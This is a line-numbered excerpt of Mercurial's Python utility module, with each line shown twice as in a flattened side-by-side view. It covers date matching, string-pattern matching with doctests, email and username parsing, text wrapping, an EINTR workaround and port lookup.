2202 try:
2203 days = int(date[1:])
2203 days = int(date[1:])
2204 except ValueError:
2204 except ValueError:
2205 raise Abort(_("invalid day spec: %s") % date[1:])
2205 raise Abort(_("invalid day spec: %s") % date[1:])
2206 if days < 0:
2206 if days < 0:
2207 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2207 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2208 % date[1:])
2208 % date[1:])
2209 when = makedate()[0] - days * 3600 * 24
2209 when = makedate()[0] - days * 3600 * 24
2210 return lambda x: x >= when
2210 return lambda x: x >= when
2211 elif " to " in date:
2211 elif " to " in date:
2212 a, b = date.split(" to ")
2212 a, b = date.split(" to ")
2213 start, stop = lower(a), upper(b)
2213 start, stop = lower(a), upper(b)
2214 return lambda x: x >= start and x <= stop
2214 return lambda x: x >= start and x <= stop
2215 else:
2215 else:
2216 start, stop = lower(date), upper(date)
2216 start, stop = lower(date), upper(date)
2217 return lambda x: x >= start and x <= stop
2217 return lambda x: x >= start and x <= stop
2218
2218
2219 def stringmatcher(pattern, casesensitive=True):
2219 def stringmatcher(pattern, casesensitive=True):
2220 """
2220 """
2221 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2221 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2222 returns the matcher name, pattern, and matcher function.
2222 returns the matcher name, pattern, and matcher function.
2223 missing or unknown prefixes are treated as literal matches.
2223 missing or unknown prefixes are treated as literal matches.
2224
2224
2225 helper for tests:
2225 helper for tests:
2226 >>> def test(pattern, *tests):
2226 >>> def test(pattern, *tests):
2227 ... kind, pattern, matcher = stringmatcher(pattern)
2227 ... kind, pattern, matcher = stringmatcher(pattern)
2228 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2228 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2229 >>> def itest(pattern, *tests):
2229 >>> def itest(pattern, *tests):
2230 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2230 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2231 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2231 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2232
2232
2233 exact matching (no prefix):
2233 exact matching (no prefix):
2234 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2234 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2235 ('literal', 'abcdefg', [False, False, True])
2235 ('literal', 'abcdefg', [False, False, True])
2236
2236
2237 regex matching ('re:' prefix)
2237 regex matching ('re:' prefix)
2238 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2238 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2239 ('re', 'a.+b', [False, False, True])
2239 ('re', 'a.+b', [False, False, True])
2240
2240
2241 force exact matches ('literal:' prefix)
2241 force exact matches ('literal:' prefix)
2242 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2242 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2243 ('literal', 're:foobar', [False, True])
2243 ('literal', 're:foobar', [False, True])
2244
2244
2245 unknown prefixes are ignored and treated as literals
2245 unknown prefixes are ignored and treated as literals
2246 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2246 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2247 ('literal', 'foo:bar', [False, False, True])
2247 ('literal', 'foo:bar', [False, False, True])
2248
2248
2249 case insensitive regex matches
2249 case insensitive regex matches
2250 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2250 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2251 ('re', 'A.+b', [False, False, True])
2251 ('re', 'A.+b', [False, False, True])
2252
2252
2253 case insensitive literal matches
2253 case insensitive literal matches
2254 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2254 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2255 ('literal', 'ABCDEFG', [False, False, True])
2255 ('literal', 'ABCDEFG', [False, False, True])
2256 """
2256 """
2257 if pattern.startswith('re:'):
2257 if pattern.startswith('re:'):
2258 pattern = pattern[3:]
2258 pattern = pattern[3:]
2259 try:
2259 try:
2260 flags = 0
2260 flags = 0
2261 if not casesensitive:
2261 if not casesensitive:
2262 flags = remod.I
2262 flags = remod.I
2263 regex = remod.compile(pattern, flags)
2263 regex = remod.compile(pattern, flags)
2264 except remod.error as e:
2264 except remod.error as e:
2265 raise error.ParseError(_('invalid regular expression: %s')
2265 raise error.ParseError(_('invalid regular expression: %s')
2266 % e)
2266 % e)
2267 return 're', pattern, regex.search
2267 return 're', pattern, regex.search
2268 elif pattern.startswith('literal:'):
2268 elif pattern.startswith('literal:'):
2269 pattern = pattern[8:]
2269 pattern = pattern[8:]
2270
2270
2271 match = pattern.__eq__
2271 match = pattern.__eq__
2272
2272
2273 if not casesensitive:
2273 if not casesensitive:
2274 ipat = encoding.lower(pattern)
2274 ipat = encoding.lower(pattern)
2275 match = lambda s: ipat == encoding.lower(s)
2275 match = lambda s: ipat == encoding.lower(s)
2276 return 'literal', pattern, match
2276 return 'literal', pattern, match
2277
2277
2278 def shortuser(user):
2278 def shortuser(user):
2279 """Return a short representation of a user name or email address."""
2279 """Return a short representation of a user name or email address."""
2280 f = user.find('@')
2280 f = user.find('@')
2281 if f >= 0:
2281 if f >= 0:
2282 user = user[:f]
2282 user = user[:f]
2283 f = user.find('<')
2283 f = user.find('<')
2284 if f >= 0:
2284 if f >= 0:
2285 user = user[f + 1:]
2285 user = user[f + 1:]
2286 f = user.find(' ')
2286 f = user.find(' ')
2287 if f >= 0:
2287 if f >= 0:
2288 user = user[:f]
2288 user = user[:f]
2289 f = user.find('.')
2289 f = user.find('.')
2290 if f >= 0:
2290 if f >= 0:
2291 user = user[:f]
2291 user = user[:f]
2292 return user
2292 return user
2293
2293
2294 def emailuser(user):
2294 def emailuser(user):
2295 """Return the user portion of an email address."""
2295 """Return the user portion of an email address."""
2296 f = user.find('@')
2296 f = user.find('@')
2297 if f >= 0:
2297 if f >= 0:
2298 user = user[:f]
2298 user = user[:f]
2299 f = user.find('<')
2299 f = user.find('<')
2300 if f >= 0:
2300 if f >= 0:
2301 user = user[f + 1:]
2301 user = user[f + 1:]
2302 return user
2302 return user
2303
2303
2304 def email(author):
2304 def email(author):
2305 '''get email of author.'''
2305 '''get email of author.'''
2306 r = author.find('>')
2306 r = author.find('>')
2307 if r == -1:
2307 if r == -1:
2308 r = None
2308 r = None
2309 return author[author.find('<') + 1:r]
2309 return author[author.find('<') + 1:r]
2310
2310
2311 def ellipsis(text, maxlength=400):
2311 def ellipsis(text, maxlength=400):
2312 """Trim string to at most maxlength (default: 400) columns in display."""
2312 """Trim string to at most maxlength (default: 400) columns in display."""
2313 return encoding.trim(text, maxlength, ellipsis='...')
2313 return encoding.trim(text, maxlength, ellipsis='...')
2314
2314
2315 def unitcountfn(*unittable):
2315 def unitcountfn(*unittable):
2316 '''return a function that renders a readable count of some quantity'''
2316 '''return a function that renders a readable count of some quantity'''
2317
2317
2318 def go(count):
2318 def go(count):
2319 for multiplier, divisor, format in unittable:
2319 for multiplier, divisor, format in unittable:
2320 if abs(count) >= divisor * multiplier:
2320 if abs(count) >= divisor * multiplier:
2321 return format % (count / float(divisor))
2321 return format % (count / float(divisor))
2322 return unittable[-1][2] % count
2322 return unittable[-1][2] % count
2323
2323
2324 return go
2324 return go
2325
2325
2326 def processlinerange(fromline, toline):
2326 def processlinerange(fromline, toline):
2327 """Check that linerange <fromline>:<toline> makes sense and return a
2327 """Check that linerange <fromline>:<toline> makes sense and return a
2328 0-based range.
2328 0-based range.
2329
2329
2330 >>> processlinerange(10, 20)
2330 >>> processlinerange(10, 20)
2331 (9, 20)
2331 (9, 20)
2332 >>> processlinerange(2, 1)
2332 >>> processlinerange(2, 1)
2333 Traceback (most recent call last):
2333 Traceback (most recent call last):
2334 ...
2334 ...
2335 ParseError: line range must be positive
2335 ParseError: line range must be positive
2336 >>> processlinerange(0, 5)
2336 >>> processlinerange(0, 5)
2337 Traceback (most recent call last):
2337 Traceback (most recent call last):
2338 ...
2338 ...
2339 ParseError: fromline must be strictly positive
2339 ParseError: fromline must be strictly positive
2340 """
2340 """
2341 if toline - fromline < 0:
2341 if toline - fromline < 0:
2342 raise error.ParseError(_("line range must be positive"))
2342 raise error.ParseError(_("line range must be positive"))
2343 if fromline < 1:
2343 if fromline < 1:
2344 raise error.ParseError(_("fromline must be strictly positive"))
2344 raise error.ParseError(_("fromline must be strictly positive"))
2345 return fromline - 1, toline
2345 return fromline - 1, toline
2346
2346
2347 bytecount = unitcountfn(
2347 bytecount = unitcountfn(
2348 (100, 1 << 30, _('%.0f GB')),
2348 (100, 1 << 30, _('%.0f GB')),
2349 (10, 1 << 30, _('%.1f GB')),
2349 (10, 1 << 30, _('%.1f GB')),
2350 (1, 1 << 30, _('%.2f GB')),
2350 (1, 1 << 30, _('%.2f GB')),
2351 (100, 1 << 20, _('%.0f MB')),
2351 (100, 1 << 20, _('%.0f MB')),
2352 (10, 1 << 20, _('%.1f MB')),
2352 (10, 1 << 20, _('%.1f MB')),
2353 (1, 1 << 20, _('%.2f MB')),
2353 (1, 1 << 20, _('%.2f MB')),
2354 (100, 1 << 10, _('%.0f KB')),
2354 (100, 1 << 10, _('%.0f KB')),
2355 (10, 1 << 10, _('%.1f KB')),
2355 (10, 1 << 10, _('%.1f KB')),
2356 (1, 1 << 10, _('%.2f KB')),
2356 (1, 1 << 10, _('%.2f KB')),
2357 (1, 1, _('%.0f bytes')),
2357 (1, 1, _('%.0f bytes')),
2358 )
2358 )
2359
2359
2360 # Matches a single EOL which can either be a CRLF where repeated CR
2360 # Matches a single EOL which can either be a CRLF where repeated CR
2361 # are removed or a LF. We do not care about old Macintosh files, so a
2361 # are removed or a LF. We do not care about old Macintosh files, so a
2362 # stray CR is an error.
2362 # stray CR is an error.
2363 _eolre = remod.compile(br'\r*\n')
2363 _eolre = remod.compile(br'\r*\n')
2364
2364
2365 def tolf(s):
2365 def tolf(s):
2366 return _eolre.sub('\n', s)
2366 return _eolre.sub('\n', s)
2367
2367
2368 def tocrlf(s):
2368 def tocrlf(s):
2369 return _eolre.sub('\r\n', s)
2369 return _eolre.sub('\r\n', s)
2370
2370
2371 if pycompat.oslinesep == '\r\n':
2371 if pycompat.oslinesep == '\r\n':
2372 tonativeeol = tocrlf
2372 tonativeeol = tocrlf
2373 fromnativeeol = tolf
2373 fromnativeeol = tolf
2374 else:
2374 else:
2375 tonativeeol = pycompat.identity
2375 tonativeeol = pycompat.identity
2376 fromnativeeol = pycompat.identity
2376 fromnativeeol = pycompat.identity
2377
2377
2378 def escapestr(s):
2378 def escapestr(s):
2379 # call underlying function of s.encode('string_escape') directly for
2379 # call underlying function of s.encode('string_escape') directly for
2380 # Python 3 compatibility
2380 # Python 3 compatibility
2381 return codecs.escape_encode(s)[0]
2381 return codecs.escape_encode(s)[0]
2382
2382
2383 def unescapestr(s):
2383 def unescapestr(s):
2384 return codecs.escape_decode(s)[0]
2384 return codecs.escape_decode(s)[0]
2385
2385
2386 def forcebytestr(obj):
2386 def forcebytestr(obj):
2387 """Portably format an arbitrary object (e.g. exception) into a byte
2387 """Portably format an arbitrary object (e.g. exception) into a byte
2388 string."""
2388 string."""
2389 try:
2389 try:
2390 return pycompat.bytestr(obj)
2390 return pycompat.bytestr(obj)
2391 except UnicodeEncodeError:
2391 except UnicodeEncodeError:
2392 # non-ascii string, may be lossy
2392 # non-ascii string, may be lossy
2393 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2393 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2394
2394
2395 def uirepr(s):
2395 def uirepr(s):
2396 # Avoid double backslash in Windows path repr()
2396 # Avoid double backslash in Windows path repr()
2397 return repr(s).replace('\\\\', '\\')
2397 return repr(s).replace('\\\\', '\\')
2398
2398
2399 # delay import of textwrap
2399 # delay import of textwrap
2400 def MBTextWrapper(**kwargs):
2400 def MBTextWrapper(**kwargs):
2401 class tw(textwrap.TextWrapper):
2401 class tw(textwrap.TextWrapper):
2402 """
2402 """
2403 Extend TextWrapper for width-awareness.
2403 Extend TextWrapper for width-awareness.
2404
2404
2405 Neither number of 'bytes' in any encoding nor 'characters' is
2405 Neither number of 'bytes' in any encoding nor 'characters' is
2406 appropriate to calculate terminal columns for specified string.
2406 appropriate to calculate terminal columns for specified string.
2407
2407
2408 Original TextWrapper implementation uses built-in 'len()' directly,
2408 Original TextWrapper implementation uses built-in 'len()' directly,
2409 so overriding is needed to use width information of each characters.
2409 so overriding is needed to use width information of each characters.
2410
2410
2411 In addition, characters classified into 'ambiguous' width are
2411 In addition, characters classified into 'ambiguous' width are
2412 treated as wide in East Asian area, but as narrow in other.
2412 treated as wide in East Asian area, but as narrow in other.
2413
2413
2414 This requires use decision to determine width of such characters.
2414 This requires use decision to determine width of such characters.
2415 """
2415 """
2416 def _cutdown(self, ucstr, space_left):
2416 def _cutdown(self, ucstr, space_left):
2417 l = 0
2417 l = 0
2418 colwidth = encoding.ucolwidth
2418 colwidth = encoding.ucolwidth
2419 for i in xrange(len(ucstr)):
2419 for i in xrange(len(ucstr)):
2420 l += colwidth(ucstr[i])
2420 l += colwidth(ucstr[i])
2421 if space_left < l:
2421 if space_left < l:
2422 return (ucstr[:i], ucstr[i:])
2422 return (ucstr[:i], ucstr[i:])
2423 return ucstr, ''
2423 return ucstr, ''
2424
2424
2425 # overriding of base class
2425 # overriding of base class
2426 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2426 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2427 space_left = max(width - cur_len, 1)
2427 space_left = max(width - cur_len, 1)
2428
2428
2429 if self.break_long_words:
2429 if self.break_long_words:
2430 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2430 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2431 cur_line.append(cut)
2431 cur_line.append(cut)
2432 reversed_chunks[-1] = res
2432 reversed_chunks[-1] = res
2433 elif not cur_line:
2433 elif not cur_line:
2434 cur_line.append(reversed_chunks.pop())
2434 cur_line.append(reversed_chunks.pop())
2435
2435
2436 # this overriding code is imported from TextWrapper of Python 2.6
2436 # this overriding code is imported from TextWrapper of Python 2.6
2437 # to calculate columns of string by 'encoding.ucolwidth()'
2437 # to calculate columns of string by 'encoding.ucolwidth()'
2438 def _wrap_chunks(self, chunks):
2438 def _wrap_chunks(self, chunks):
2439 colwidth = encoding.ucolwidth
2439 colwidth = encoding.ucolwidth
2440
2440
2441 lines = []
2441 lines = []
2442 if self.width <= 0:
2442 if self.width <= 0:
2443 raise ValueError("invalid width %r (must be > 0)" % self.width)
2443 raise ValueError("invalid width %r (must be > 0)" % self.width)
2444
2444
2445 # Arrange in reverse order so items can be efficiently popped
2445 # Arrange in reverse order so items can be efficiently popped
2446 # from a stack of chucks.
2446 # from a stack of chucks.
2447 chunks.reverse()
2447 chunks.reverse()
2448
2448
2449 while chunks:
2449 while chunks:
2450
2450
2451 # Start the list of chunks that will make up the current line.
2451 # Start the list of chunks that will make up the current line.
2452 # cur_len is just the length of all the chunks in cur_line.
2452 # cur_len is just the length of all the chunks in cur_line.
2453 cur_line = []
2453 cur_line = []
2454 cur_len = 0
2454 cur_len = 0
2455
2455
2456 # Figure out which static string will prefix this line.
2456 # Figure out which static string will prefix this line.
2457 if lines:
2457 if lines:
2458 indent = self.subsequent_indent
2458 indent = self.subsequent_indent
2459 else:
2459 else:
2460 indent = self.initial_indent
2460 indent = self.initial_indent
2461
2461
2462 # Maximum width for this line.
2462 # Maximum width for this line.
2463 width = self.width - len(indent)
2463 width = self.width - len(indent)
2464
2464
2465 # First chunk on line is whitespace -- drop it, unless this
2465 # First chunk on line is whitespace -- drop it, unless this
2466 # is the very beginning of the text (i.e. no lines started yet).
2466 # is the very beginning of the text (i.e. no lines started yet).
2467 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2467 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2468 del chunks[-1]
2468 del chunks[-1]
2469
2469
2470 while chunks:
2470 while chunks:
2471 l = colwidth(chunks[-1])
2471 l = colwidth(chunks[-1])
2472
2472
2473 # Can at least squeeze this chunk onto the current line.
2473 # Can at least squeeze this chunk onto the current line.
2474 if cur_len + l <= width:
2474 if cur_len + l <= width:
2475 cur_line.append(chunks.pop())
2475 cur_line.append(chunks.pop())
2476 cur_len += l
2476 cur_len += l
2477
2477
2478 # Nope, this line is full.
2478 # Nope, this line is full.
2479 else:
2479 else:
2480 break
2480 break
2481
2481
2482 # The current line is full, and the next chunk is too big to
2482 # The current line is full, and the next chunk is too big to
2483 # fit on *any* line (not just this one).
2483 # fit on *any* line (not just this one).
2484 if chunks and colwidth(chunks[-1]) > width:
2484 if chunks and colwidth(chunks[-1]) > width:
2485 self._handle_long_word(chunks, cur_line, cur_len, width)
2485 self._handle_long_word(chunks, cur_line, cur_len, width)
2486
2486
2487 # If the last chunk on this line is all whitespace, drop it.
2487 # If the last chunk on this line is all whitespace, drop it.
2488 if (self.drop_whitespace and
2488 if (self.drop_whitespace and
2489 cur_line and cur_line[-1].strip() == r''):
2489 cur_line and cur_line[-1].strip() == r''):
2490 del cur_line[-1]
2490 del cur_line[-1]
2491
2491
2492 # Convert current line back to a string and store it in list
2492 # Convert current line back to a string and store it in list
2493 # of all lines (return value).
2493 # of all lines (return value).
2494 if cur_line:
2494 if cur_line:
2495 lines.append(indent + r''.join(cur_line))
2495 lines.append(indent + r''.join(cur_line))
2496
2496
2497 return lines
2497 return lines
2498
2498
2499 global MBTextWrapper
2499 global MBTextWrapper
2500 MBTextWrapper = tw
2500 MBTextWrapper = tw
2501 return tw(**kwargs)
2501 return tw(**kwargs)
2502
2502
2503 def wrap(line, width, initindent='', hangindent=''):
2503 def wrap(line, width, initindent='', hangindent=''):
2504 maxindent = max(len(hangindent), len(initindent))
2504 maxindent = max(len(hangindent), len(initindent))
2505 if width <= maxindent:
2505 if width <= maxindent:
2506 # adjust for weird terminal size
2506 # adjust for weird terminal size
2507 width = max(78, maxindent + 1)
2507 width = max(78, maxindent + 1)
2508 line = line.decode(pycompat.sysstr(encoding.encoding),
2508 line = line.decode(pycompat.sysstr(encoding.encoding),
2509 pycompat.sysstr(encoding.encodingmode))
2509 pycompat.sysstr(encoding.encodingmode))
2510 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2510 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2511 pycompat.sysstr(encoding.encodingmode))
2511 pycompat.sysstr(encoding.encodingmode))
2512 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2512 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2513 pycompat.sysstr(encoding.encodingmode))
2513 pycompat.sysstr(encoding.encodingmode))
2514 wrapper = MBTextWrapper(width=width,
2514 wrapper = MBTextWrapper(width=width,
2515 initial_indent=initindent,
2515 initial_indent=initindent,
2516 subsequent_indent=hangindent)
2516 subsequent_indent=hangindent)
2517 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2517 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2518
2518
2519 if (pyplatform.python_implementation() == 'CPython' and
2519 if (pyplatform.python_implementation() == 'CPython' and
2520 sys.version_info < (3, 0)):
2520 sys.version_info < (3, 0)):
2521 # There is an issue in CPython that some IO methods do not handle EINTR
2521 # There is an issue in CPython that some IO methods do not handle EINTR
2522 # correctly. The following table shows what CPython version (and functions)
2522 # correctly. The following table shows what CPython version (and functions)
2523 # are affected (buggy: has the EINTR bug, okay: otherwise):
2523 # are affected (buggy: has the EINTR bug, okay: otherwise):
2524 #
2524 #
2525 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2525 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2526 # --------------------------------------------------
2526 # --------------------------------------------------
2527 # fp.__iter__ | buggy | buggy | okay
2527 # fp.__iter__ | buggy | buggy | okay
2528 # fp.read* | buggy | okay [1] | okay
2528 # fp.read* | buggy | okay [1] | okay
2529 #
2529 #
2530 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2530 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2531 #
2531 #
2532 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2532 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2533 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2533 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2534 #
2534 #
2535 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2535 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2536 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2536 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2537 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2537 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2538 # fp.__iter__ but not other fp.read* methods.
2538 # fp.__iter__ but not other fp.read* methods.
2539 #
2539 #
2540 # On modern systems like Linux, the "read" syscall cannot be interrupted
2540 # On modern systems like Linux, the "read" syscall cannot be interrupted
2541 # when reading "fast" files like on-disk files. So the EINTR issue only
2541 # when reading "fast" files like on-disk files. So the EINTR issue only
2542 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2542 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2543 # files approximately as "fast" files and use the fast (unsafe) code path,
2543 # files approximately as "fast" files and use the fast (unsafe) code path,
2544 # to minimize the performance impact.
2544 # to minimize the performance impact.
2545 if sys.version_info >= (2, 7, 4):
2545 if sys.version_info >= (2, 7, 4):
2546 # fp.readline deals with EINTR correctly, use it as a workaround.
2546 # fp.readline deals with EINTR correctly, use it as a workaround.
2547 def _safeiterfile(fp):
2547 def _safeiterfile(fp):
2548 return iter(fp.readline, '')
2548 return iter(fp.readline, '')
2549 else:
2549 else:
2550 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2550 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2551 # note: this may block longer than necessary because of bufsize.
2551 # note: this may block longer than necessary because of bufsize.
2552 def _safeiterfile(fp, bufsize=4096):
2552 def _safeiterfile(fp, bufsize=4096):
2553 fd = fp.fileno()
2553 fd = fp.fileno()
2554 line = ''
2554 line = ''
2555 while True:
2555 while True:
2556 try:
2556 try:
2557 buf = os.read(fd, bufsize)
2557 buf = os.read(fd, bufsize)
2558 except OSError as ex:
2558 except OSError as ex:
2559 # os.read only raises EINTR before any data is read
2559 # os.read only raises EINTR before any data is read
2560 if ex.errno == errno.EINTR:
2560 if ex.errno == errno.EINTR:
2561 continue
2561 continue
2562 else:
2562 else:
2563 raise
2563 raise
2564 line += buf
2564 line += buf
2565 if '\n' in buf:
2565 if '\n' in buf:
2566 splitted = line.splitlines(True)
2566 splitted = line.splitlines(True)
2567 line = ''
2567 line = ''
2568 for l in splitted:
2568 for l in splitted:
2569 if l[-1] == '\n':
2569 if l[-1] == '\n':
2570 yield l
2570 yield l
2571 else:
2571 else:
2572 line = l
2572 line = l
2573 if not buf:
2573 if not buf:
2574 break
2574 break
2575 if line:
2575 if line:
2576 yield line
2576 yield line
2577
2577
2578 def iterfile(fp):
2578 def iterfile(fp):
2579 fastpath = True
2579 fastpath = True
2580 if type(fp) is file:
2580 if type(fp) is file:
2581 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2581 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2582 if fastpath:
2582 if fastpath:
2583 return fp
2583 return fp
2584 else:
2584 else:
2585 return _safeiterfile(fp)
2585 return _safeiterfile(fp)
2586 else:
2586 else:
2587 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2587 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2588 def iterfile(fp):
2588 def iterfile(fp):
2589 return fp
2589 return fp
2590
2590
2591 def iterlines(iterator):
2591 def iterlines(iterator):
2592 for chunk in iterator:
2592 for chunk in iterator:
2593 for line in chunk.splitlines():
2593 for line in chunk.splitlines():
2594 yield line
2594 yield line
2595
2595
2596 def expandpath(path):
2596 def expandpath(path):
2597 return os.path.expanduser(os.path.expandvars(path))
2597 return os.path.expanduser(os.path.expandvars(path))
2598
2598
2599 def hgcmd():
2599 def hgcmd():
2600 """Return the command used to execute current hg
2600 """Return the command used to execute current hg
2601
2601
2602 This is different from hgexecutable() because on Windows we want
2602 This is different from hgexecutable() because on Windows we want
2603 to avoid things opening new shell windows like batch files, so we
2603 to avoid things opening new shell windows like batch files, so we
2604 get either the python call or current executable.
2604 get either the python call or current executable.
2605 """
2605 """
2606 if mainfrozen():
2606 if mainfrozen():
2607 if getattr(sys, 'frozen', None) == 'macosx_app':
2607 if getattr(sys, 'frozen', None) == 'macosx_app':
2608 # Env variable set by py2app
2608 # Env variable set by py2app
2609 return [encoding.environ['EXECUTABLEPATH']]
2609 return [encoding.environ['EXECUTABLEPATH']]
2610 else:
2610 else:
2611 return [pycompat.sysexecutable]
2611 return [pycompat.sysexecutable]
2612 return gethgcmd()
2612 return gethgcmd()
2613
2613
2614 def rundetached(args, condfn):
2614 def rundetached(args, condfn):
2615 """Execute the argument list in a detached process.
2615 """Execute the argument list in a detached process.
2616
2616
2617 condfn is a callable which is called repeatedly and should return
2617 condfn is a callable which is called repeatedly and should return
2618 True once the child process is known to have started successfully.
2618 True once the child process is known to have started successfully.
2619 At this point, the child process PID is returned. If the child
2619 At this point, the child process PID is returned. If the child
2620 process fails to start or finishes before condfn() evaluates to
2620 process fails to start or finishes before condfn() evaluates to
2621 True, return -1.
2621 True, return -1.
2622 """
2622 """
2623 # Windows case is easier because the child process is either
2623 # Windows case is easier because the child process is either
2624 # successfully starting and validating the condition or exiting
2624 # successfully starting and validating the condition or exiting
2625 # on failure. We just poll on its PID. On Unix, if the child
2625 # on failure. We just poll on its PID. On Unix, if the child
2626 # process fails to start, it will be left in a zombie state until
2626 # process fails to start, it will be left in a zombie state until
2627 # the parent wait on it, which we cannot do since we expect a long
2627 # the parent wait on it, which we cannot do since we expect a long
2628 # running process on success. Instead we listen for SIGCHLD telling
2628 # running process on success. Instead we listen for SIGCHLD telling
2629 # us our child process terminated.
2629 # us our child process terminated.
2630 terminated = set()
2630 terminated = set()
2631 def handler(signum, frame):
2631 def handler(signum, frame):
2632 terminated.add(os.wait())
2632 terminated.add(os.wait())
2633 prevhandler = None
2633 prevhandler = None
2634 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2634 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2635 if SIGCHLD is not None:
2635 if SIGCHLD is not None:
2636 prevhandler = signal.signal(SIGCHLD, handler)
2636 prevhandler = signal.signal(SIGCHLD, handler)
2637 try:
2637 try:
2638 pid = spawndetached(args)
2638 pid = spawndetached(args)
2639 while not condfn():
2639 while not condfn():
2640 if ((pid in terminated or not testpid(pid))
2640 if ((pid in terminated or not testpid(pid))
2641 and not condfn()):
2641 and not condfn()):
2642 return -1
2642 return -1
2643 time.sleep(0.1)
2643 time.sleep(0.1)
2644 return pid
2644 return pid
2645 finally:
2645 finally:
2646 if prevhandler is not None:
2646 if prevhandler is not None:
2647 signal.signal(signal.SIGCHLD, prevhandler)
2647 signal.signal(signal.SIGCHLD, prevhandler)
2648
2648
2649 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2649 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2650 """Return the result of interpolating items in the mapping into string s.
2650 """Return the result of interpolating items in the mapping into string s.
2651
2651
2652 prefix is a single character string, or a two character string with
2652 prefix is a single character string, or a two character string with
2653 a backslash as the first character if the prefix needs to be escaped in
2653 a backslash as the first character if the prefix needs to be escaped in
2654 a regular expression.
2654 a regular expression.
2655
2655
2656 fn is an optional function that will be applied to the replacement text
2656 fn is an optional function that will be applied to the replacement text
2657 just before replacement.
2657 just before replacement.
2658
2658
2659 escape_prefix is an optional flag that allows using doubled prefix for
2659 escape_prefix is an optional flag that allows using doubled prefix for
2660 its escaping.
2660 its escaping.
2661 """
2661 """
2662 fn = fn or (lambda s: s)
2662 fn = fn or (lambda s: s)
2663 patterns = '|'.join(mapping.keys())
2663 patterns = '|'.join(mapping.keys())
2664 if escape_prefix:
2664 if escape_prefix:
2665 patterns += '|' + prefix
2665 patterns += '|' + prefix
2666 if len(prefix) > 1:
2666 if len(prefix) > 1:
2667 prefix_char = prefix[1:]
2667 prefix_char = prefix[1:]
2668 else:
2668 else:
2669 prefix_char = prefix
2669 prefix_char = prefix
2670 mapping[prefix_char] = prefix_char
2670 mapping[prefix_char] = prefix_char
2671 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2671 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2672 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2672 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2673
2673
2674 def getport(port):
2674 def getport(port):
2675 """Return the port for a given network service.
2675 """Return the port for a given network service.
2676
2676
2677 If port is an integer, it's returned as is. If it's a string, it's
2677 If port is an integer, it's returned as is. If it's a string, it's
2678 looked up using socket.getservbyname(). If there's no matching
2678 looked up using socket.getservbyname(). If there's no matching
2679 service, error.Abort is raised.
2679 service, error.Abort is raised.
2680 """
2680 """
2681 try:
2681 try:
2682 return int(port)
2682 return int(port)
2683 except ValueError:
2683 except ValueError:
2684 pass
2684 pass
2685
2685
2686 try:
2686 try:
2687 return socket.getservbyname(port)
2687 return socket.getservbyname(port)
2688 except socket.error:
2688 except socket.error:
2689 raise Abort(_("no port number associated with service '%s'") % port)
2689 raise Abort(_("no port number associated with service '%s'") % port)
2690
2690
